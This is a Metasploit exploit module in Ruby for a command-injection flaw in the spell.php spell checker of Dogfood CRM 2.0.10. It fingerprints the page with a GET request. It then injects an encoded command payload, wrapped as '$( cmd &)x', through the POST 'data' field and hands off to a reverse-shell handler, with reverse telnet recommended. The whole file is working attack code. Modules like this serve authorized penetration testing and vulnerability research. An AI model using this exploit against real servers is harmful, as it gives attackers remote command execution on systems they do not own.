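##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Dogfood CRM spell.php command injection (Metasploit exploit module).
#
# The module issues exactly two request shapes, both against the script
# named by the URIPATH option: a GET in #check that only fingerprints the
# page, and a POST in #exploit that carries the encoded payload in the
# `data` field and then hands control to the framework's payload handler.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Register module metadata and the single URIPATH option.
  #
  # @param info [Hash] metadata merged by the framework via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Dogfood CRM spell.php Remote Command Execution',
        'Description' => %q{
          This module exploits a previously unpublished vulnerability in the
          Dogfood CRM mail function which is vulnerable to command injection
          in the spell check feature. Because of character restrictions, this
          exploit works best with the double-reverse telnet payload. This
          vulnerability was discovered by LSO and affects v2.0.10.
        },
        'Author' => [
          'LSO <lso[at]hushmail.com>', # Exploit module
          'aushack', # Added check code, QA tested ok 20090303, there are no references (yet).
        ],
        'License' => BSD_LICENSE,
        'References' => [
          [ 'OSVDB', '54707' ],
          [ 'URL', 'http://downloads.sourceforge.net/dogfood/' ],
        ],
        'Privileged' => false,
        'Platform' => ['unix'], # aushack - removed win, linux -> untested
        'Arch' => ARCH_CMD,
        'Payload' => {
          'Space' => 1024,
          'DisableNops' => true,
          # BadChars is the quote set; the original author's note is that
          # PHP's magic_quotes_gpc escapes them in a default install.
          'BadChars' => %q|'"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install
          'Compat' => {
            'PayloadType' => 'cmd cmd_bash',
            'RequiredCmd' => 'generic perl ruby python bash-tcp telnet',
          }
        },
        'Targets' => [ ['Automatic', {}], ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2009-03-03',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        # Path of the spell-checker script. Both #check and #exploit read it
        # back from the datastore and pass it through normalize_uri.
        OptString.new('URIPATH', [ true, "The URI of the spell checker", '/dogfood/mail/spell.php']),
      ]
    )
  end

  # Fingerprint the spell checker with a single GET (1 second timeout).
  #
  # Only the presence of the page is established — the body is matched
  # against "Spell Check complete" — not the injection itself, which is why
  # the positive answer is CheckCode::Detected rather than Vulnerable.
  #
  # @return [Exploit::CheckCode] Detected when the marker is present, Safe
  #   otherwise (including a nil response on timeout, or a nil body)
  def check
    res = send_request_raw(
      {
        'uri' => normalize_uri(datastore['URIPATH']),
      }, 1
    )

    # Safe navigation keeps a nil response or nil body on the Safe path
    # instead of raising NoMethodError.
    return Exploit::CheckCode::Detected if res&.body&.match?(/Spell Check complete/)

    Exploit::CheckCode::Safe
  end

  # Send the payload in the POST `data` field and invoke the handler.
  #
  # The encoded payload is wrapped as "$( <cmd> &)x" and URI-encoded before
  # it is placed in the request body. The HTTP response is not inspected:
  # the original code assigned it to an unused local (`response`), which is
  # dropped here; outcome is judged by the payload handler, not by the reply.
  #
  # @return [void]
  def exploit
    # Short timeout on the POST. Presumably the backgrounded command ("&")
    # leaves the request pending, so no useful reply is expected — TODO confirm.
    timeout = 1

    cmd = payload.encoded
    data = "data=#{Rex::Text.uri_encode('$( ' + cmd + ' &)x')}"
    uri = normalize_uri(datastore['URIPATH'])

    # Return value intentionally discarded (see method comment).
    send_request_cgi(
      {
        'uri' => uri,
        'method' => "POST",
        'data' => data
      },
      timeout
    )

    handler
  end
end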